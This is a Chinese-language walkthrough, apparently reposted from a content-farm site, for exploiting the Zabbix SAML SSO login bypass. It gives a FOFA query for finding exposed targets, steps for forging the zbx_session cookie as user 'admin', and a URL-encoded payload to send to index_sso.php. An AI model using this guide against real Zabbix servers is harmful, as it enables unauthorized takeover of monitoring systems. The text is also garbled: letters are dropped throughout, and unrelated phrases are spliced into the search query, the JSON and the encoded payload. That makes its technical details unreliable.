Zabbix SAML SSO 登录绕过漏洞的操作流程

一、简介

zabbix是一个基于web界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数，保证服务器系统的安全运营；并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

zabbix rver可以通过snmp，zabbix agent，ping，端口监视等方法提供对远程服务器/网络状态的监视，数据收集等功能，它可以运行在linux，solaris，hp-ux，aix，free bsd，open bsd，os x等平台上。

该漏洞源于在启用samlsso 身份验证（非默认）的情况下，未身份验证的攻击者可以修改会话数据，成功绕过前台进入后台，因为存储在会话中的用户登录未经过验证。

漏洞的限制条件：需要启用 saml 身份验证，并且攻击者必须知道 zabbix 用户的用户名。

二、fofa语法

app=“zabbix-监控系统” &&北师大香港浸会大学amp; body=“saml”

三、复现流程

1、通过fofa语法搜索zabbix资产访问首页获取t-cookie中zbx_ssion参数的值

2、通过url解码和ba64解码获得zbx_ssion参数json格式数据

{“ssionid”:”67f71355eb96121f384ea0571290faca”,”sign”:”uyq2bxqfe5iug4ubpucwq3pxamvh0ctpr4pvefzg\/owe7tkhmaqdqyu5iumtwzqr+0m33eqbhnk1vv+io0icaq==”}

3、通过在json中添加saml_data和urname_attribute参数后重新ba64编码和url编码构造payload

{“saml_data”:{“urname_attribute”:”admin”},”ssionid”:”67f71355eb96121f384ea0571290faca”,”sign”:”uyq2bxqfe5iug4ubpucwq3pxamvh0ctpr4pvefzg\/ow年会搞笑节目e7tkhmaqdqyu5iumtwzqr+0m33eqbhnk1vv+io0icaq==”}

4、把构造好的payload进行ba64编码和url编码

%65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69%4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4工作失误情况说明d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%5week7%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32%52%57%5a%36%5a%31爱似百汇电视剧%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a%54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5、请求index_sso.php，在http请求头中构造payload，将zbx_ssion的值替换为url编码后的payload

6、成功登录后台

可利用poc直接获取构造后的payload

poc：

到此这篇关于zabbix saml sso 登录绕过漏洞的文章就介绍到这了,更多相关zabbix 登录绕过漏洞内容请搜索www.887551.com以前的文章或继续浏览下面的相关文章希望大家以后多多支持www.887551.com！